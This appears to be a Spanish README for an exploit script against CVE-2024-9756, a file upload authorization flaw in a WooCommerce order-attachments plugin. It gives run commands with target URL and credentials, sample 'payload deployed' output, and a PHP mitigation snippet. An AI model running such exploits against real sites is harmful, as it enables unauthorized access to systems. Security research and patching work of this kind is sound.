
Order Attachments for WooCommerce 2.0 - 2.4.1 - Falta de autorización para usuarios autenticados (Suscriptor+) con carga arbitraria limitada de archivos
Este exploit aprovecha una vulnerabilidad de subida arbitraria de archivos no autorizada y limitada en el plugin Order Attachments for WooCommerce (versiones 2.0 a 2.4.1) para WordPress.
La vulnerabilidad permite a usuarios autenticados (Suscriptor+) subir tipos de archivo restringidos sin la autorización adecuada.
Este script es solo para fines educativos y de investigación en seguridad. Cualquier uso no autorizado de este exploit en sistemas que no te pertenecen es estrictamente ilegal.
Asegúrate de tener lo siguiente antes de ejecutar el exploit:
requests → Instalar con:
pip install requests
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD>
Ejemplo:
python3 CVE-2024-9756.py -u http://192.168.100.74:888/wordpress4 -un khaled -p mypassword
Puedes especificar nombres de archivo personalizados e IDs de pedido:
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD> --filename="custom.png" --filetype="image/png"
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD> -o 200
Si tiene éxito, el script devolverá la URL del archivo subido:
[*] Iniciando autenticación...
[✔] Autenticación exitosa.
[*] Desplegando payload: Nxploit.jpg al pedido 196...
[✔] ¡Payload desplegado exitosamente!
🔗 URL del archivo: http://192.168.100.74:888/wordpress4/wp-content/uploads/2025/03/Nxploit.jpg
functions.php para bloquear wp_ajax_wcoa_add_attachment de usuarios no autorizados:
if (!current_user_can('manage_woocommerce')) {
wp_send_json_error(['message' => 'Unauthorized'], 403);
exit;
}
Este exploit se publica con fines educativos y de investigación en seguridad únicamente.
El uso no autorizado contra sistemas sin permiso explícito es ilegal y está penado por las leyes de ciberseguridad.
Úsalo bajo tu propio riesgo.